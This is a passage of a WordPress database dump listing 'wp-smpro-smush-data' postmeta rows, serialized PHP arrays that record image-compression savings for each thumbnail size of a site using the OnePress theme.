s:11:\"size_before\";i:11347;s:10:\"size_after\";i:10617;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.3300000000000000710542735760100185871124267578125;s:5:\"bytes\";i:2051;s:11:\"size_before\";i:27969;s:10:\"size_after\";i:25918;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(4434,1646,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:6.7680816177810161349270856590010225772857666015625;s:5:\"bytes\";i:1486;s:11:\"size_before\";i:21956;s:10:\"size_after\";i:20470;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.12000000000000010658141036401502788066864013671875;s:5:\"bytes\";i:174;s:11:\"size_before\";i:2843;s:10:\"size_after\";i:2669;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.1699999999999999289457264239899814128875732421875;s:5:\"bytes\";i:249;s:11:\"size_before\";i:4819;s:10:\"size_after\";i:4570;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.32000000000000028421709430404007434844970703125;s:5:\"bytes\";i:243;s:11:\"size_before\";i:4569;s:10:\"size_after\";i:4326;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.42999999999999971578290569595992565155029296875;s:5:\"bytes\";i:820;s:11:\"size_before\";i:9725;s:10:\"size_after\";i:8905;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4435,1603,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:20.215565724995713026146404445171356201171875;s:5:\"bytes\";i:149709;s:11:\"size_before\";i:740563;s:10:\"size_after\";i:590854;s:4:\"time\";d:3.62999999999999989341858963598497211933135986328125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:21.370000000000000994759830064140260219573974609375;s:5:\"bytes\";i:3014;s:11:\"size_before\";i:14105;s:10:\"size_after\";i:11091;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:24.449999999999999289457264239899814128875732421875;s:5:\"bytes\";i:6834;s:11:\"size_before\";i:27951;s:10:\"size_after\";i:21117;s:4:\"time\";d:0.11999999999999999555910790149937383830547332763671875;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.339999999999999857891452847979962825775146484375;s:5:\"bytes\";i:28068;s:11:\"size_before\";i:210367;s:10:\"size_after\";i:182299;s:4:\"time\";d:0.979999999999999982236431605997495353221893310546875;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:22.60000000000000142108547152020037174224853515625;s:5:\"bytes\";i:90804;s:11:\"size_before\";i:401704;s:10:\"size_after\";i:310900;s:4:\"time\";d:2.0099999999999997868371792719699442386627197265625;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:27.4200000000000017053025658242404460906982421875;s:5:\"bytes\";i:3812;s:11:\"size_before\";i:13903;s:10:\"size_after\";i:10091;s:4:\"time\";d:0.08000000000000000166533453693773481063544750213623046875;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:25.4200000000000017053025658242404460906982421875;s:5:\"bytes\";i:7422;s:11:\"size_before\";i:29201;s:10:\"size_after\";i:21779;s:4:\"time\";d:0.14000000000000001332267629550187848508358001708984375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:22.510000000000001563194018672220408916473388671875;s:5:\"bytes\";i:9755;s:11:\"size_before\";i:43332;s:10:\"size_after\";i:33577;s:4:\"time\";d:0.25;}}}'),(4436,1406,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:39.8722518043366136453187209554016590118408203125;s:5:\"bytes\";i:102811;s:11:\"size_before\";i:257851;s:10:\"size_after\";i:155040;s:4:\"time\";d:0.230000000000000037747582837255322374403476715087890625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:41.28999999999999914734871708787977695465087890625;s:5:\"bytes\";i:8043;s:11:\"size_before\";i:19478;s:10:\"size_after\";i:11435;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:37.5;s:5:\"bytes\";i:24930;s:11:\"size_before\";i:66479;s:10:\"size_after\";i:41549;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:41.14999999999999857891452847979962825775146484375;s:5:\"bytes\";i:24000;s:11:\"size_before\";i:58322;s:10:\"size_after\";i:34322;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:40.3599999999999994315658113919198513031005859375;s:5:\"bytes\";i:45838;s:11:\"size_before\";i:113572;s:10:\"size_after\";i:67734;s:4:\"time\";d:0.08000000000000000166533453693773481063544750213623046875;}}}'),(4437,1404,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:14.2835741620929628226122076739557087421417236328125;s:5:\"bytes\";i:31464;s:11:\"size_before\";i:220281;s:10:\"size_after\";i:188817;s:4:\"time\";d:0.2800000000000000266453525910037569701671600341796875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:20.32000000000000028421709430404007434844970703125;s:5:\"bytes\";i:3616;s:11:\"size_before\";i:17797;s:10:\"size_after\";i:14181;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.8800000000000007815970093361102044582366943359375;s:5:\"bytes\";i:7874;s:11:\"size_before\";i:56729;s:10:\"size_after\";i:48855;s:4:\"time\";d:0.0899999999999999966693309261245303787291049957275390625;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.800000000000000710542735760100185871124267578125;s:5:\"bytes\";i:6961;s:11:\"size_before\";i:54363;s:10:\"size_after\";i:47402;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:14.2400000000000002131628207280300557613372802734375;s:5:\"bytes\";i:13013;s:11:\"size_before\";i:91392;s:10:\"size_after\";i:78379;s:4:\"time\";d:0.1000000000000000055511151231257827021181583404541015625;}}}'),(4438,1401,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:8.7102358796797236806241926387883722782135009765625;s:5:\"bytes\";i:19320;s:11:\"size_before\";i:221808;s:10:\"size_after\";i:202488;s:4:\"time\";d:0.289999999999999980015985556747182272374629974365234375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:15.6099999999999994315658113919198513031005859375;s:5:\"bytes\";i:2870;s:11:\"size_before\";i:18380;s:10:\"size_after\";i:15510;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.3300000000000000710542735760100185871124267578125;s:5:\"bytes\";i:4816;s:11:\"size_before\";i:57785;s:10:\"size_after\";i:52969;s:4:\"time\";d:0.0899999999999999966693309261245303787291049957275390625;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.87000000000000010658141036401502788066864013671875;s:5:\"bytes\";i:4259;s:11:\"size_before\";i:54123;s:10:\"size_after\";i:49864;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.0600000000000004973799150320701301097869873046875;s:5:\"bytes\";i:7375;s:11:\"size_before\";i:91520;s:10:\"size_after\";i:84145;s:4:\"time\";d:0.11000000000000000055511151231257827021181583404541015625;}}}'),(4439,1397,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:7.8991540958985790865654053050093352794647216796875;s:5:\"bytes\";i:14306;s:11:\"size_before\";i:181108;s:10:\"size_after\";i:166802;s:4:\"time\";d:0.39000000000000001332267629550187848508358001708984375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:3.399999999999999911182158029987476766109466552734375;s:5:\"bytes\";i:534;s:11:\"size_before\";i:15704;s:10:\"size_after\";i:15170;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.6699999999999999289457264239899814128875732421875;s:5:\"bytes\";i:2881;s:11:\"size_before\";i:50795;s:10:\"size_after\";i:47914;s:4:\"time\";d:0.1000000000000000055511151231257827021181583404541015625;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.9900000000000002131628207280300557613372802734375;s:5:\"bytes\";i:4160;s:11:\"size_before\";i:37855;s:10:\"size_after\";i:33695;s:4:\"time\";d:0.08000000000000000166533453693773481063544750213623046875;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.769999999999999573674358543939888477325439453125;s:5:\"bytes\";i:6731;s:11:\"size_before\";i:76754;s:10:\"size_after\";i:70023;s:4:\"time\";d:0.179999999999999993338661852249060757458209991455078125;}}}'),(4440,1392,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:26.645260187432501908233462017960846424102783203125;s:5:\"bytes\";i:45889;s:11:\"size_before\";i:172222;s:10:\"size_after\";i:126333;s:4:\"time\";d:0.2400000000000000188737914186276611872017383575439453125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:14.42999999999999971578290569595992565155029296875;s:5:\"bytes\";i:1795;s:11:\"size_before\";i:12443;s:10:\"size_after\";i:10648;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.7799999999999993605115378159098327159881591796875;s:5:\"bytes\";i:5736;s:11:\"size_before\";i:44887;s:10:\"size_after\";i:39151;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.1500000000000003552713678800500929355621337890625;s:5:\"bytes\";i:4569;s:11:\"size_before\";i:37592;s:10:\"size_after\";i:33023;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:43.71000000000000085265128291212022304534912109375;s:5:\"bytes\";i:33789;s:11:\"size_before\";i:77300;s:10:\"size_after\";i:43511;s:4:\"time\";d:0.1000000000000000055511151231257827021181583404541015625;}}}'),(4441,1391,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:9.4610118519487063082351596676744520664215087890625;s:5:\"bytes\";i:10130;s:11:\"size_before\";i:107071;s:10:\"size_after\";i:96941;s:4:\"time\";d:0.2399999999999999911182158029987476766109466552734375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.589999999999999857891452847979962825775146484375;s:5:\"bytes\";i:763;s:11:\"size_before\";i:7959;s:10:\"size_after\";i:7196;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.6199999999999992184029906638897955417633056640625;s:5:\"bytes\";i:2323;s:11:\"size_before\";i:26952;s:10:\"size_after\";i:24629;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.79000000000000003552713678800500929355621337890625;s:5:\"bytes\";i:2052;s:11:\"size_before\";i:26352;s:10:\"size_after\";i:24300;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.9000000000000003552713678800500929355621337890625;s:5:\"bytes\";i:4992;s:11:\"size_before\";i:45808;s:10:\"size_after\";i:40816;s:4:\"time\";d:0.08000000000000000166533453693773481063544750213623046875;}}}'),(4442,1386,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:19.4611604303060659049151581712067127227783203125;s:5:\"bytes\";i:34571;s:11:\"size_before\";i:177641;s:10:\"size_after\";i:143070;s:4:\"time\";d:0.63000000000000000444089209850062616169452667236328125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:15.3100000000000004973799150320701301097869873046875;s:5:\"bytes\";i:1868;s:11:\"size_before\";i:12204;s:10:\"size_after\";i:10336;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:17.260000000000001563194018672220408916473388671875;s:5:\"bytes\";i:8129;s:11:\"size_before\";i:47109;s:10:\"size_after\";i:38980;s:4:\"time\";d:0.179999999999999993338661852249060757458209991455078125;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:20.769999999999999573674358543939888477325439453125;s:5:\"bytes\";i:6395;s:11:\"size_before\";i:30785;s:10:\"size_after\";i:24390;s:4:\"time\";d:0.11999999999999999555910790149937383830547332763671875;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:20.769999999999999573674358543939888477325439453125;s:5:\"bytes\";i:18179;s:11:\"size_before\";i:87543;s:10:\"size_after\";i:69364;s:4:\"time\";d:0.2800000000000000266453525910037569701671600341796875;}}}'),(4443,1364,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:15.3017722423106103946111034019850194454193115234375;s:5:\"bytes\";i:13711;s:11:\"size_before\";i:89604;s:10:\"size_after\";i:75893;s:4:\"time\";d:0.2600000000000000088817841970012523233890533447265625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.3800000000000007815970093361102044582366943359375;s:5:\"bytes\";i:1034;s:11:\"size_before\";i:9959;s:10:\"size_after\";i:8925;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.05999999999999960920149533194489777088165283203125;s:5:\"bytes\";i:1882;s:11:\"size_before\";i:31062;s:10:\"size_after\";i:29180;s:4:\"time\";d:0.1000000000000000055511151231257827021181583404541015625;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:12720;s:10:\"size_after\";i:12720;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:30.10000000000000142108547152020037174224853515625;s:5:\"bytes\";i:10795;s:11:\"size_before\";i:35863;s:10:\"size_after\";i:25068;s:4:\"time\";d:0.1000000000000000055511151231257827021181583404541015625;}}}'),(4444,1354,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:4.59141853123300780481486071948893368244171142578125;s:5:\"bytes\";i:11315;s:11:\"size_before\";i:246438;s:10:\"size_after\";i:235123;s:4:\"time\";d:0.320000000000000006661338147750939242541790008544921875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.17999999999999971578290569595992565155029296875;s:5:\"bytes\";i:794;s:11:\"size_before\";i:18999;s:10:\"size_after\";i:18205;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:3.37000000000000010658141036401502788066864013671875;s:5:\"bytes\";i:2254;s:11:\"size_before\";i:66792;s:10:\"size_after\";i:64538;s:4:\"time\";d:0.1000000000000000055511151231257827021181583404541015625;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:2.12999999999999989341858963598497211933135986328125;s:5:\"bytes\";i:1003;s:11:\"size_before\";i:47117;s:10:\"size_after\";i:46114;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.4000000000000003552713678800500929355621337890625;s:5:\"bytes\";i:7264;s:11:\"size_before\";i:113530;s:10:\"size_after\";i:106266;s:4:\"time\";d:0.13000000000000000444089209850062616169452667236328125;}}}'),(4445,1336,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:24.753444679371654046917683444917201995849609375;s:5:\"bytes\";i:52332;s:11:\"size_before\";i:211413;s:10:\"size_after\";i:159081;s:4:\"time\";d:0.270000000000000017763568394002504646778106689453125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:14.160000000000000142108547152020037174224853515625;s:5:\"bytes\";i:2241;s:11:\"size_before\";i:15824;s:10:\"size_after\";i:13583;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:15.3499999999999996447286321199499070644378662109375;s:5:\"bytes\";i:8707;s:11:\"size_before\";i:56728;s:10:\"size_after\";i:48021;s:4:\"time\";d:0.0899999999999999966693309261245303787291049957275390625;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:17.910000000000000142108547152020037174224853515625;s:5:\"bytes\";i:7372;s:11:\"size_before\";i:41162;s:10:\"size_after\";i:33790;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:34.81000000000000227373675443232059478759765625;s:5:\"bytes\";i:34012;s:11:\"size_before\";i:97699;s:10:\"size_after\";i:63687;s:4:\"time\";d:0.11000000000000000055511151231257827021181583404541015625;}}}'),(4446,1334,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:7.63521752693007282886128450627438724040985107421875;s:5:\"bytes\";i:18847;s:11:\"size_before\";i:246843;s:10:\"size_after\";i:227996;s:4:\"time\";d:0.3000000000000000444089209850062616169452667236328125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.03000000000000024868995751603506505489349365234375;s:5:\"bytes\";i:1600;s:11:\"size_before\";i:22749;s:10:\"size_after\";i:21149;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.589999999999999857891452847979962825775146484375;s:5:\"bytes\";i:4682;s:11:\"size_before\";i:83707;s:10:\"size_after\";i:79025;s:4:\"time\";d:0.1000000000000000055511151231257827021181583404541015625;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.07000000000000028421709430404007434844970703125;s:5:\"bytes\";i:2148;s:11:\"size_before\";i:30398;s:10:\"size_after\";i:28250;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.4700000000000006394884621840901672840118408203125;s:5:\"bytes\";i:10417;s:11:\"size_before\";i:109989;s:10:\"size_after\";i:99572;s:4:\"time\";d:0.1000000000000000055511151231257827021181583404541015625;}}}'),(4447,1332,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:5.20828168495314525188177867676131427288055419921875;s:5:\"bytes\";i:7353;s:11:\"size_before\";i:141179;s:10:\"size_after\";i:133826;s:4:\"time\";d:0.309999999999999997779553950749686919152736663818359375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:10342;s:10:\"size_after\";i:10342;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:3.0099999999999997868371792719699442386627197265625;s:5:\"bytes\";i:1121;s:11:\"size_before\";i:37207;s:10:\"size_after\";i:36086;s:4:\"time\";d:0.0899999999999999966693309261245303787291049957275390625;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:1.9099999999999999200639422269887290894985198974609375;s:5:\"bytes\";i:514;s:11:\"size_before\";i:26920;s:10:\"size_after\";i:26406;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.57000000000000028421709430404007434844970703125;s:5:\"bytes\";i:5718;s:11:\"size_before\";i:66710;s:10:\"size_after\";i:60992;s:4:\"time\";d:0.13000000000000000444089209850062616169452667236328125;}}}'),(4448,1327,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:11.56924743783927311824299977160990238189697265625;s:5:\"bytes\";i:20929;s:11:\"size_before\";i:180902;s:10:\"size_after\";i:159973;s:4:\"time\";d:0.40000000000000002220446049250313080847263336181640625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.769999999999999573674358543939888477325439453125;s:5:\"bytes\";i:1748;s:11:\"size_before\";i:16226;s:10:\"size_after\";i:14478;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.5800000000000000710542735760100185871124267578125;s:5:\"bytes\";i:6175;s:11:\"size_before\";i:53309;s:10:\"size_after\";i:47134;s:4:\"time\";d:0.1000000000000000055511151231257827021181583404541015625;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:14.910000000000000142108547152020037174224853515625;s:5:\"bytes\";i:6144;s:11:\"size_before\";i:41220;s:10:\"size_after\";i:35076;s:4:\"time\";d:0.0899999999999999966693309261245303787291049957275390625;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.7799999999999993605115378159098327159881591796875;s:5:\"bytes\";i:6862;s:11:\"size_before\";i:70147;s:10:\"size_after\";i:63285;s:4:\"time\";d:0.179999999999999993338661852249060757458209991455078125;}}}'),(4449,1321,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:178366;s:10:\"size_after\";i:178366;s:4:\"time\";d:0.429999999999999993338661852249060757458209991455078125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:17528;s:10:\"size_after\";i:17528;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:57000;s:10:\"size_after\";i:57000;s:4:\"time\";d:0.14000000000000001332267629550187848508358001708984375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:27970;s:10:\"size_after\";i:27970;s:4:\"time\";d:0.08000000000000000166533453693773481063544750213623046875;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:75868;s:10:\"size_after\";i:75868;s:4:\"time\";d:0.179999999999999993338661852249060757458209991455078125;}}}'),(4450,1319,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:11.38506250975776623590718372724950313568115234375;s:5:\"bytes\";i:9480;s:11:\"size_before\";i:83267;s:10:\"size_after\";i:73787;s:4:\"time\";d:0.210000000000000019984014443252817727625370025634765625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:14.019999999999999573674358543939888477325439453125;s:5:\"bytes\";i:1362;s:11:\"size_before\";i:9712;s:10:\"size_after\";i:8350;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.17999999999999971578290569595992565155029296875;s:5:\"bytes\";i:3160;s:11:\"size_before\";i:31053;s:10:\"size_after\";i:27893;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:0.190000000000000002220446049250313080847263336181640625;s:5:\"bytes\";i:16;s:11:\"size_before\";i:8390;s:10:\"size_after\";i:8374;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:14.4900000000000002131628207280300557613372802734375;s:5:\"bytes\";i:4942;s:11:\"size_before\";i:34112;s:10:\"size_after\";i:29170;s:4:\"time\";d:0.08000000000000000166533453693773481063544750213623046875;}}}'),(4451,1318,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:132617;s:10:\"size_after\";i:132617;s:4:\"time\";d:0.2300000000000000099920072216264088638126850128173828125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:10200;s:10:\"size_after\";i:10200;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:41457;s:10:\"size_after\";i:41457;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:20056;s:10:\"size_after\";i:20056;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:60904;s:10:\"size_after\";i:60904;s:4:\"time\";d:0.0899999999999999966693309261245303787291049957275390625;}}}'),(4452,1316,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:8.5549503364306307418019059696234762668609619140625;s:5:\"bytes\";i:7209;s:11:\"size_before\";i:84267;s:10:\"size_after\";i:77058;s:4:\"time\";d:0.190000000000000002220446049250313080847263336181640625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:5441;s:10:\"size_after\";i:5441;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.009999